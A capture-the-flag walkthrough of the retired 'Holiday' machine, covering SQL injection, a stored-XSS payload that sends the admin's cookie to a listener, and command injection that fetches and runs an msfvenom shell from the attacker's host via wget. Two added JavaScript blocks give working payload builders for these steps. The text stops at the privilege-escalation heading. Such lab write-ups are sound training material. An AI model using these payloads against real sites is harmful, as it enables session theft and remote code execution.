Today we’re going to solve another CTF machine, “Holiday”. The box is now retired and can be accessed with a VIP membership.

Introduction

Specifications

  • Target OS: Linux
  • Services: SSH, HTTP Node.js
  • IP Address: 10.10.10.25
  • Difficulty: Brainfuck

Weakness

  • Obtaining data with stored XSS
  • Exploiting a sudo NOPASSWD entry

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step is the reconnaissance phase, starting with port scanning.

Ports Scanning

In this step we identify which services are running behind the IP address.

Enumerate Directories

We have an HTTP service running on port 8000.

Let’s run a directory enumeration tool to find hidden paths.

We found an /admin path that answers with a 302 redirect to /login. Now that we have a login form we can test it for weak credentials (brute force) or SQL injection.

SQLMap

Let’s try SQLMap first and see if the login form is vulnerable to SQL injection. We capture the login POST request with Burp and save it to sqlmap.req.

Now run SQLMap against the saved request.

I tried cracking the dumped hashes with rockyou.txt, but unfortunately the password did not crack.

So let’s try an online cracker such as CrackStation.

CrackStation cracks the MD5 hash:

RickA:nevergonnagiveyouup

After logging in we can see a bunch of information containing names, reference numbers and UUIDs.

We can view bookings and add notes to them. Something that caught my eye is the following text on the “Add Note” page:

There is some kind of manual review of notes by an administrator. That should make us think of stored XSS: whatever we put in a note will be rendered in the admin’s browser.

Our goal here is to get the admin’s browser to make a web request to our listener carrying as much information as we can send, the session cookie at the very least.

Example: convert the payload into CharCode (a String.fromCharCode expression) with a tool such as:

http://jdstiles.com/java/cct.html

This leaves only digits, commas and parentheses in the JavaScript body, so the payload does not depend on quotes or other characters that the note field might strip.

After submitting the XSS payload we listen on our port and wait for the admin to review the note.

And we get a callback that includes the administrator’s cookie, which we can use to bypass the admin login.
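The following is an added example and not code from the original writeup: it builds the stored-XSS note payload as a String.fromCharCode(...) expression (the same transformation the CharCode converter performs), checks that it decodes back to the intended script, and parses the callback the admin’s browser makes to our listener. The listener address, the query parameter names and the sample request line are assumptions made for this example.

```javascript
// Added example, not code from the original writeup.
// Assumptions: the listener URL and the parameter names c/u are placeholders.
const LISTENER = 'http://10.10.14.5:8000/';   // assumed attacker listener

// Second stage: what the admin's browser executes. It sends document.cookie
// and the page URL to the listener as an image request, so it fires without
// any click and is not blocked by same-origin policy.
const stage2 =
  "new Image().src='" + LISTENER +
  "?c='+encodeURIComponent(document.cookie)+'&u='+encodeURIComponent(location.href);";

// Turn any string into String.fromCharCode(...): the result contains only
// digits, commas and parentheses (no quotes, slashes or spaces).
function toCharCode(s) {
  const codes = [];
  for (const ch of s) codes.push(ch.codePointAt(0));
  return 'String.fromCharCode(' + codes.join(',') + ')';
}

// Wrap the encoded stage in an <img> whose onerror handler evals it.
// The attribute value needs no quotes because it contains no spaces.
function buildNotePayload(js) {
  return '<img src=x onerror=eval(' + toCharCode(js) + ')>';
}

// Reverse the encoding the way the victim's browser does, without eval,
// so we can verify the payload decodes to exactly the script we wanted.
function fromCharCode(expr) {
  const m = /^String\.fromCharCode\(([\d,]*)\)$/.exec(expr);
  if (!m) throw new Error('not a fromCharCode expression');
  if (m[1] === '') return '';
  return String.fromCharCode(...m[1].split(',').map(Number));
}

// Listener side: pull the cookie and page URL out of the request line we
// receive (searchParams undoes the encodeURIComponent done in stage2).
function parseCallback(requestLine) {
  const path = requestLine.split(' ')[1];
  const url = new URL(path, LISTENER);
  return { cookie: url.searchParams.get('c'), page: url.searchParams.get('u') };
}

// Constructed sample of what the listener would log once the admin opens the note.
const sampleRequest =
  'GET /?c=session%3Dconstructed-admin-cookie&u=http%3A%2F%2F10.10.10.25%3A8000%2Fadmin HTTP/1.1';

console.log(buildNotePayload(stage2));
console.log(parseCallback(sampleRequest));
```

The payload printed by buildNotePayload is what goes into the note; once the admin views it, parseCallback shows how to recover the cookie from the request your listener receives.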

Since we have the administrator’s cookie we can set it in our browser and try navigating to the /admin directory.

That works, and we now have two options: Bookings and Notes.

The Bookings page contains a command injection (RCE).

Note: & has to be sent URL-encoded as %26, because a bare & is filtered.

Now we create a payload with msfvenom.

Then we start a Python HTTP server so the target can fetch our shell with wget, and start a listener for the reverse connection.

We have to convert our IP address to its decimal form for the wget URL.

https://www.browserling.com/tools/ip-to-dec
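The helpers below are an added example and not code from the original writeup: they do the dotted-quad to decimal conversion the browserling tool performs (with the reverse conversion so the number can be double-checked), assemble the wget/chmod/run chain, and URL-encode it so that & travels as %26. The listener IP, port and file name are assumptions; the chain uses && rather than a single & so the file is fully downloaded before it is executed.

```javascript
// Added example, not code from the original writeup.
// Assumptions: listener 10.10.14.5:8000 and the file name shell.elf are placeholders.

// Dotted-quad IPv4 -> single 32-bit decimal. wget, curl and the resolver all
// accept http://168431109:8000/ as a host, and it contains no dots.
function ipToDecimal(ip) {
  const octets = ip.split('.');
  if (octets.length !== 4) throw new Error('expected a dotted quad: ' + ip);
  return octets.reduce((acc, o) => {
    const n = Number(o);
    if (!/^\d+$/.test(o) || n > 255) throw new Error('bad octet: ' + o);
    return acc * 256 + n;
  }, 0);
}

// Reverse conversion, to sanity-check the number before using it.
function decimalToIp(n) {
  if (!Number.isInteger(n) || n < 0 || n > 0xFFFFFFFF) throw new Error('out of range: ' + n);
  return [24, 16, 8, 0].map(shift => (n >>> shift) & 255).join('.');
}

// The command we want the server to run: fetch the msfvenom payload from our
// HTTP server, make it executable and run it.
function buildStager(ip, port, file) {
  const host = ipToDecimal(ip);
  return `wget http://${host}:${port}/${file} -O /tmp/${file} && chmod +x /tmp/${file} && /tmp/${file}`;
}

// Encode the command for the query string: & becomes %26 (otherwise it would
// end the parameter), space becomes %20, / becomes %2F.
function encodeForQuery(cmd) {
  return encodeURIComponent(cmd);
}

const stager = buildStager('10.10.14.5', 8000, 'shell.elf');
console.log(stager);
console.log(encodeForQuery(stager));
```

Paste the encoded string as the injected parameter value; decodeURIComponent on the server side (or the web framework’s query parser) restores the original command, && included.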

And finally we get a user shell.

Privilege Escalation

Now we move on to getting root. We can use enumeration scripts to collect information, or do some manual research first, which is what I do most of the time.

This is what LinEnum.sh found: